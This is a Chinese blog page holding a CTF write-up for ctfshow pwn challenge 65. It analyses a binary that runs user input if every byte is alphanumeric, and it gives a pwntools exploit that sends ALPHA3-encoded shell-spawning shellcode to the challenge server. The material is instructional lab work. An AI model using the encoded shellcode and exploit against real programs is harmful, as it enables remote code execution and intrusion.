<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="ctfshow6512345678Arch:       amd64-64-littleRELRO:      Full RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        PIE enabledStack:      ExecutableRWX:        Has RWX">
<meta property="og:type" content="article">
<meta property="og:title" content="shellcode（ctfshow65）">
<meta property="og:url" content="http://example.com/2025/01/31/shellcode2/index.html">
<meta property="og:site_name" content="小小pwn">
<meta property="og:description" content="ctfshow6512345678Arch:       amd64-64-littleRELRO:      Full RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        PIE enabledStack:      ExecutableRWX:        Has RWX">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/01/31/shellcode2/image-20250131165007290.png">
<meta property="article:published_time" content="2025-01-31T06:11:58.000Z">
<meta property="article:modified_time" content="2025-01-31T12:23:36.931Z">
<meta property="article:author" content="和方煜">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/01/31/shellcode2/image-20250131165007290.png">

<link rel="canonical" href="http://example.com/2025/01/31/shellcode2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>shellcode（ctfshow65） | 小小pwn</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">小小pwn</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/01/31/shellcode2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="和方煜">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="小小pwn">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          shellcode（ctfshow65）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2025-01-31 14:11:58 / 修改时间：20:23:36" itemprop="dateCreated datePublished" datetime="2025-01-31T14:11:58+08:00">2025-01-31</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%AC%AC%E4%B8%89%E5%91%A8/" itemprop="url" rel="index"><span itemprop="name">第三周</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>3.4k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>3 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="ctfshow65"><a href="#ctfshow65" class="headerlink" title="ctfshow65"></a>ctfshow65</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Arch:       amd64-64-little</span><br><span class="line">RELRO:      Full RELRO</span><br><span class="line">Stack:      No canary found</span><br><span class="line">NX:         NX unknown - GNU_STACK missing</span><br><span class="line">PIE:        PIE enabled</span><br><span class="line">Stack:      Executable</span><br><span class="line">RWX:        Has RWX segments</span><br><span class="line">Stripped:   No</span><br></pre></td></tr></table></figure>

<p>64位，开启PIE,完全开启RELRO,Has RWX segments  </p>
<p>ida：无法反编译，借助ai理解一下代码</p>
<h2 id="汇编代码"><a href="#汇编代码" class="headerlink" title="汇编代码"></a>汇编代码</h2><p><strong>1.<code>jl</code> (Jump if Less)</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cmp eax, ebx</span><br><span class="line">jl loc_1234</span><br></pre></td></tr></table></figure>

<p><strong>如果 <code>eax &lt; ebx</code>，则跳转到 <code>loc_1234</code></strong></p>
<p><strong>2.<code>jg</code> (Jump if Greater)</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cmp eax, ebx</span><br><span class="line">jg loc_1234</span><br></pre></td></tr></table></figure>

<p><strong>如果 <code>eax &gt; ebx</code>，则跳转到 <code>loc_1234</code></strong></p>
<p><strong>3.<code>jle</code> (Jump if Less or Equal)</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cmp eax, ebx</span><br><span class="line">jle loc_1234</span><br></pre></td></tr></table></figure>

<p><strong>如果 <code>eax &lt;= ebx</code>，则跳转到 <code>loc_1234</code></strong></p>
<p><strong>4.<code>jmp</code> (Jump)</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jmp loc_1234</span><br></pre></td></tr></table></figure>

<p><strong>无论条件如何，都会跳转到 <code>loc_1234</code></strong></p>
<p><strong>5.<code>cmp</code> (Compare)</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmp eax, ebx</span><br></pre></td></tr></table></figure>

<p><strong>比较 <code>eax</code> 和 <code>ebx</code> 的大小，并根据结果设置标志位</strong></p>
<p><strong>6.<code>cdqe</code>、<code>movzx</code></strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cdqe</span><br><span class="line">movzx   eax, [rbp+rax+buf]</span><br></pre></td></tr></table></figure>

<p><strong>这个实在看不懂，粘一下师傅们的解释</strong></p>
<p><strong>cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展（16-32） EAX是32位的寄存器，而AX是EAX的低16位,AH是ax的高8位，而AL是ax的低8位大致就是将我们输入的字符串每一位进行比较</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">main:</span><br><span class="line">    push    rbp</span><br><span class="line">    mov     rbp, rsp</span><br><span class="line">    sub     rsp, 410h</span><br><span class="line">    mov     edx, 14h</span><br><span class="line">    lea     rsi, aInputYouShellc</span><br><span class="line">    mov     edi, 1</span><br><span class="line">    mov     eax, 0</span><br><span class="line">    call    _write</span><br><span class="line">    lea     rax, [rbp+buf]</span><br><span class="line">    mov     edx, 400h</span><br><span class="line">    mov     rsi, rax</span><br><span class="line">    mov     edi, 0</span><br><span class="line">    mov     eax, 0</span><br><span class="line">    call    _read</span><br><span class="line">    mov     [rbp+var_8], eax</span><br><span class="line">    cmp     [rbp+var_8], 0</span><br><span class="line">    jg      short loc_11AC</span><br><span class="line">    mov     eax, 0</span><br><span class="line">    jmp     locret_1254</span><br></pre></td></tr></table></figure>

<p><strong>提示用户输入</strong>：</p>
<p>使用 <code>_write</code> 函数向标准输出打印提示信息 <code>&quot;Input you Shellcode\n&quot;</code>。</p>
<p><strong>读取用户输入</strong>：</p>
<p>使用 <code>_read</code> 函数从标准输入读取用户输入的数据，存储到缓冲区 <code>buf</code> 中。</p>
<p><code>var_8</code> 存储了 <code>_read</code> 的返回值，表示实际读取的字节数。</p>
<p><strong>检查输入长度</strong>：</p>
<p>如果 <code>var_8 &gt; 0</code>，表示用户输入了数据，程序跳转到 <code>loc_11AC</code>。</p>
<p>如果 <code>var_8 &lt;= 0</code>，表示用户没有输入任何内容，程序直接返回</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">loc_11AC:</span><br><span class="line">    mov     [rbp+var_4], 0</span><br><span class="line">    jmp     loc_123A</span><br><span class="line"></span><br><span class="line">loc_11B8:</span><br><span class="line">    mov     eax, [rbp+var_4]</span><br><span class="line">    cdqe</span><br><span class="line">    movzx   eax, [rbp+rax+buf]</span><br><span class="line">    cmp     al, 60h ; &#x27;`&#x27;</span><br><span class="line">    jle     short loc_11DA</span><br><span class="line">    mov     eax, [rbp+var_4]</span><br><span class="line">    cdqe</span><br><span class="line">    movzx   eax, [rbp+rax+buf]</span><br><span class="line">    cmp     al, 7Ah ; &#x27;z&#x27;</span><br><span class="line">    jle     short loc_1236</span><br><span class="line">    jmp     loc_11DA</span><br><span class="line"></span><br><span class="line">loc_11DA:</span><br><span class="line">    mov     eax, [rbp+var_4]</span><br><span class="line">    cdqe</span><br><span class="line">    movzx   eax, [rbp+rax+buf]</span><br><span class="line">    cmp     al, 40h ; &#x27;@&#x27;</span><br><span class="line">    jle     short loc_11FC</span><br><span class="line">    mov     eax, [rbp+var_4]</span><br><span class="line">    cdqe</span><br><span class="line">    movzx   eax, [rbp+rax+buf]</span><br><span class="line">    cmp     al, 5Ah ; &#x27;Z&#x27;</span><br><span class="line">    jle     short loc_1236</span><br><span class="line">    jmp     loc_11FC</span><br><span class="line"></span><br><span class="line">loc_11FC:</span><br><span class="line">    mov     eax, [rbp+var_4]</span><br><span class="line">    cdqe</span><br><span class="line">    movzx   eax, [rbp+rax+buf]</span><br><span class="line">    cmp     al, 2Fh ; &#x27;/&#x27;</span><br><span class="line">    jle     short loc_121E</span><br><span class="line">    mov     eax, [rbp+var_4]</span><br><span class="line">    cdqe</span><br><span class="line">    movzx   eax, [rbp+rax+buf]</span><br><span class="line">    cmp     al, 5Ah ; &#x27;Z&#x27;</span><br><span class="line">    jle     short loc_1236</span><br><span class="line">    jmp     loc_121E</span><br><span class="line"></span><br><span class="line">loc_121E:</span><br><span class="line">    lea     rdi, format</span><br><span class="line">    mov     eax, 0</span><br><span class="line">    call    _printf</span><br><span class="line">    mov     eax, 0</span><br><span class="line">    jmp     locret_1254</span><br><span class="line"></span><br><span class="line">loc_1236:</span><br><span class="line">    add     [rbp+var_4], 1</span><br><span class="line">    jmp     loc_123A</span><br><span class="line"></span><br><span class="line">loc_123A:</span><br><span class="line">    mov     eax, [rbp+var_4]</span><br><span class="line">    cmp     eax, [rbp+var_8]</span><br><span class="line">    jl      loc_11B8</span><br><span class="line">    lea     rax, [rbp+buf]</span><br><span class="line">    call    rax</span><br><span class="line">    mov     eax, 0</span><br><span class="line">locret_1254:</span><br><span class="line">    leave</span><br><span class="line">    retn</span><br></pre></td></tr></table></figure>

<p><strong>初始化索引</strong>：</p>
<p>在 <code>loc_11AC</code>，程序将 <code>var_4</code> 初始化为 <code>0</code>。</p>
<p><strong>循环检查输入内容</strong>：</p>
<p>在 <code>loc_11B8</code>，程序逐字节检查用户输入的内容：</p>
<p>如果字节值在 <code>[0x2F, 0x5A]</code> 或 <code>[0x40, 0x5A]</code> 或 <code>[0x60, 0x7A]</code> 范围内，程序继续检查下一个字节。</p>
<p><strong>[0x2F, 0x5A]：</strong><code>/</code>到 <code>Z</code>（包括大小写字母和一些符号）</p>
<p><strong>[0x40, 0x5A]：</strong><code>@</code> 到 <code>Z</code>（主要是大写字母和一些符号）</p>
<p><strong>[0x60, 0x7A]：</strong><code>反引号</code>到  <code>z</code>（主要是小写字母和一些符号）</p>
<p>如果字节值不在上述范围内，程序打印 <code>&quot;Good,but not right&quot;</code> 并返回。</p>
<p><strong>执行用户输入</strong>：</p>
<p>如果所有字节都满足条件，程序会将 <code>buf</code> 的地址加载到寄存器 <code>rax</code> 中，并调用 <code>buf</code>。这意味着程序会尝试执行用户输入的内容</p>
<p>这些范围正好是ASSCII码的范围，我们可以直接将shellcode输入到buf，后面程序就会调用，但是输入的shellcode需要是可见字符string.printable</p>
<p>生成可见字符shellcode使用alpha3就可以生成</p>
<h2 id="alpha03"><a href="#alpha03" class="headerlink" title="alpha03"></a>alpha03</h2><h3 id="1-生成shellcode"><a href="#1-生成shellcode" class="headerlink" title="1.生成shellcode"></a>1.生成shellcode</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">sc = asm(shellcraft.sh())</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;sc&#x27;</span>, <span class="string">&#x27;bw&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">	f.write(sc)</span><br></pre></td></tr></table></figure>

<h3 id="2-将上述代码保存成sc-py放到alpha3目录下，然后执行如下命令生成待编码的shellcode文件"><a href="#2-将上述代码保存成sc-py放到alpha3目录下，然后执行如下命令生成待编码的shellcode文件" class="headerlink" title="2.将上述代码保存成sc.py放到alpha3目录下，然后执行如下命令生成待编码的shellcode文件"></a>2.将上述代码保存成sc.py放到alpha3目录下，然后执行如下命令生成待编码的shellcode文件</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 sc.py &gt; sc</span><br></pre></td></tr></table></figure>

<p><strong>3.使用alpha3生成string.printable （这里得用 python2）</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 ./ALPHA3.py x64 ascii mixedcase rax --input=&quot;sc&quot;  #这里的参数 rax 是需要填入执行 shellcode 的那个寄存器</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shellcode=<span class="string">&#x27;Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t&#x27;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2025/01/31/shellcode2/image-20250131165007290.png" alt="image-20250131165007290"></p>
<h2 id="exp："><a href="#exp：" class="headerlink" title="exp："></a>exp：</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context(arch = <span class="string">&#x27;amd64&#x27;</span>,os = <span class="string">&#x27;linux&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">io = remote(<span class="string">&#x27;pwn.challenge.ctf.show&#x27;</span>,<span class="number">28139</span>)</span><br><span class="line">shellcode=<span class="string">&#x27;Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t&#x27;</span></span><br><span class="line">payload = shellcode </span><br><span class="line">io.send(payload)   <span class="comment">#注意不能用sendline换行符不在区间里</span></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/wp/" rel="tag"># wp</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/01/30/shellcode1/" rel="prev" title="shellcode（ctfshow58-64）">
      <i class="fa fa-chevron-left"></i> shellcode（ctfshow58-64）
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/02/01/shellcode3/" rel="next" title="shellcode（ctfshow66）">
      shellcode（ctfshow66） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ctfshow65"><span class="nav-number">1.</span> <span class="nav-text">ctfshow65</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B1%87%E7%BC%96%E4%BB%A3%E7%A0%81"><span class="nav-number">1.1.</span> <span class="nav-text">汇编代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#alpha03"><span class="nav-number">1.2.</span> <span class="nav-text">alpha03</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E7%94%9F%E6%88%90shellcode"><span class="nav-number">1.2.1.</span> <span class="nav-text">1.生成shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%B0%86%E4%B8%8A%E8%BF%B0%E4%BB%A3%E7%A0%81%E4%BF%9D%E5%AD%98%E6%88%90sc-py%E6%94%BE%E5%88%B0alpha3%E7%9B%AE%E5%BD%95%E4%B8%8B%EF%BC%8C%E7%84%B6%E5%90%8E%E6%89%A7%E8%A1%8C%E5%A6%82%E4%B8%8B%E5%91%BD%E4%BB%A4%E7%94%9F%E6%88%90%E5%BE%85%E7%BC%96%E7%A0%81%E7%9A%84shellcode%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.2.</span> <span class="nav-text">2.将上述代码保存成sc.py放到alpha3目录下，然后执行如下命令生成待编码的shellcode文件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp%EF%BC%9A"><span class="nav-number">1.3.</span> <span class="nav-text">exp：</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">和方煜</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">和方煜</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">48k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">43 分钟</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>



// 在最后添加
<script src="/js/code-unfold.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
